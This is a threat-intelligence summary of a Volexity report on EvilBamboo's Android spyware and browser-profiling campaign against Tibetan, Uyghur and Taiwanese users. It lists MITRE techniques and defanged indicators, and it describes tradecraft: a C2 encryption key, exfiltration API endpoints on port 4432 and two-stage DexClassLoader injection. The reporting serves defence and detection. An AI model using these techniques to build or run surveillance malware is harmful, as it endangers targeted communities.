Keypoints
- EvilBamboo has run long-term campaigns targeting Tibetan, Uyghur, and Taiwanese communities using bespoke Android spyware families: BADBAZAAR, BADSIGNAL, and BADSOLAR.
- Malware is distributed via repackaged legitimate apps, fake websites (e.g., signalplus[.]org, allwhatsapp[.]net), Telegram channels, APK forums, and occasionally the Apple App Store.
- Common code overlap centers on GetOperatorName() and DeviceInfo() functions used to profile infected devices and produce a JSON device object.
- BADSOLAR and BADBAZAAR use a two-stage model where a loader downloads a JAR and injects it via DexClassLoader; the second-stage implant is AndroRAT-derived and exposes broad surveillance commands.
- BADSIGNAL is a single-stage backdoor of Signal that uses a REST API on port 4432 with endpoints (/api/Location, /api/values, /api/QRCode, /api/Proxy) to exfiltrate device and Signal data and silently link devices.
- JMASK, an obfuscated JavaScript profiler loaded from fake sites (via jquery.min.js), fingerprints browsers, collects device locale/timezone/screen data, and enumerates MetaMask accounts to gate exploit delivery (port 9001 / IRONSQUIRREL).
- Operational details include encrypted C2 strings (DES key “yhnrfv”), C2 channels over raw sockets and HTTP REST, SSL pinning in some samples, and use of Telegram/Reddit/YouTube personas to build trust and distribute malware.
MITRE Techniques
- [T1598] Phishing – Fake websites and social media profiles were created “likely used to deploy browser-based exploits against targeted users.”
- [T1203] Exploitation for Client Execution – The actor used a “Safari exploit to infect Uyghur users with custom iOS malware.”
- [T1059.007] Command and Scripting Interpreter: JavaScript – A custom obfuscated profiler “JMASK is a custom profiler that is minified and obfuscated” used in-browser to fingerprint and triage victims.
- [T1071] Application Layer Protocol – C2 communication used REST APIs and custom channels, e.g., “C2 communication through a REST API on port 4432” and raw sockets for other families.
- [T1105] Ingress Tool Transfer – Loaders “download a JAR file from the C2 server and load it by using the DexClassLoader()” to deploy second-stage implants.
- [T1027] Obfuscated Files or Information – The JMASK script was “obfuscated through the use of Unicode declarations of each string, which are declared in reverse.”
- [T1005] Data from Local System – Malware commands collect device artifacts: “Get SMS messages, get call logs, get the device information, take photos, get the contacts list… get the location of the device.”
- [T1036] Masquerading – Malware is “inserted as a backdoor into legitimate applications” and distributed as cracked or localized versions to appear legitimate.
Indicators of Compromise
- [Domain] distribution/fake sites – signalplus[.]org, allwhatsapp[.]net (used to host and distribute backdoored apps; also related: flygram[.]org, groupgram[.]org, ignitetibet[.]net, comeflxyr[.]com, uyghurinfo[.]net, tibetone[.]org)
- [IP address] hosting overlap – 45.154.12[.]80 (hosts ignitetibet[.]net and overlaps with uyghurinfo[.]net; related to distribution infrastructure)
- [C2 domain] command-and-control – comeflxyr[.]com (decrypted BADSOLAR C2) and other REST API hosts on port 4432 used by BADSIGNAL
- [URL] suspected exploit/IRONSQUIRREL – hxxps://jindjjdtc[.]com/HxtDp2fORTSU.html (iframe-linked from ignitetibet[.]net; assessed as similar to IRONSQUIRREL URIs)
- [App names / filenames] repackaged apps and artifacts – cracked Whoscall APK (shared on APK forums), TibetOne iOS app (removed from App Store)
- [JavaScript] profiler file – jquery.min.js (loaded an obfuscated profiling script, JMASK)
Volexity links the three Android families by shared functions GetOperatorName() and DeviceInfo(), which produce the JSON device profile used across implants. BADBAZAAR, BADSOLAR, and some variants implement a two-stage model where the APK’s loader downloads a JAR from an encrypted C2 (BADSOLAR’s C2 decrypts to comeflxyr[.]com using DES key “yhnrfv”) and loads it with DexClassLoader; the second stage is AndroRAT-derived and exposes commands to collect SMS (real-time forwarding), call logs, IMEI/IMSI, Wi‑Fi details, photos, contacts, installed apps, files, and location. Some BADBAZAAR samples add an updater flow (judgeUpdateOrNot / sbDownload) to fetch newer APKs, while BADSIGNAL embeds full backdoor functionality in the main APK and communicates via a REST API on port 4432 with endpoints (/api/Location, /api/values, /api/QRCode, /api/Proxy) that exfiltrate device and Signal-specific data and silently link a remote device to a Signal account.
Distribution is achieved through social engineering: repackaged legitimate apps shared on APK forums, Telegram channels, Reddit posts, fake websites (signalplus[.]org, allwhatsapp[.]net, flygram[.]org), and occasionally an app that appeared in the Apple App Store (TibetOne). On the web side, pages load an obfuscated JavaScript profiler (JMASK via jquery.min.js) that enumerates timezone, language, screen resolution, canvas fingerprints, and MetaMask accounts; Volexity assesses JMASK likely triaged visitors and gated exploit delivery (e.g., an exploit host on port 9001 and potential IRONSQUIRREL payloads) to only serve high-value victims.
Operational & detection details: C2 traffic appears over HTTP REST and raw sockets, some samples implement SSL pinning, C2 strings are stored encrypted (DES key “yhnrfv” observed), and misconfigured C2 endpoints exposed API endpoints that revealed an iOS variant in development. Detection recommendations focus on blocking the enumerated domains/IPs and scanning for the shared DeviceInfo/GetOperatorName code patterns and JMASK-like JavaScript profiling.
Read more: https://www.volexity.com/blog/2023/09/22/evilbamboo-targets-mobile-devices-in-multi-year-campaign/